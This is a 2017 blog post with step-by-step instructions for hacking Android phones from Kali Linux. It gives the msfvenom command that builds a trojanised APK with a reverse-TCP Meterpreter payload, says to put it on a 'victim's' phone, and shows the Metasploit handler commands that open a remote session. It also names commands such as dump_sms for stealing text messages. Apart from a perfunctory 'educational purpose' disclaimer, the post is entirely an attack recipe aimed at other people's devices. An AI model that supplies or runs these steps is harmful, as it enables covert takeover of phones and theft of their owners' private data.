Wednesday, February 8, 2017

Hacking Any Android Phones Using Kali linux 2.0(MSFVENOM)

Hacking Any Android Phones Using Kali linux 2.0 .

Using msfvenom on hacking android device

  • Hacking android phones using simple msfvenom payload.
  • Firstly,fire up your kali linux and open your terminal .
  • After opening your terminal type command:msfvenom -p android/meterpreter/reverse_tcp set LHOST=(ip address using sudo ifconfig if you are admin) set LPORT=4444 R>test.apk
  • Secondly, now you must simply transfer the apk into victim's mobile phone.(note this method works only for devices connected in same network but,if you want to hack phone remotely than just port forward your ip address going into setting of your router .
  • Now, we must create metasploit session and create the listener.So, for doing that open another terminal and type command: msfconsole.
  • After typing that command the metasploit firmware would be open then we must use multi handler exploit ;For that type command: use exploit/multi/handler/ .
  • Then, multi handler gets open . Now , we must set payload for android and our meterpreter. So, type command: set PAYLOAD android/meterpreter/reverse_tcp.
  • After setting up payload we must again setup lhost and lport so simply type command :set LHOST (Your ip address form sudo ifconfig).
  • Then , again type command :set LPORT 4444.
  • Finally, hit command : exploit
  • So,if victim have installed the program on their mobile phone then you will get meterpreter session on your phone and type command: help. By, entering that command you can see list of command that can be use on hacking phone .For example:sysinfo (to check which system has installed and all android operating system infromation> check_root(to see if device is rooted or not),dump_sms(for fetching all sms available on the device ) .
So, you can easily hack any android device using this method .Down below, i have also kept youtube link for video .Hopeyou enjoyed it .
Note: Only for educational purpose guys . I won't be responsible for any harm on devices.
Watch video if you did'nt understand the above process

No comments:

Post a Comment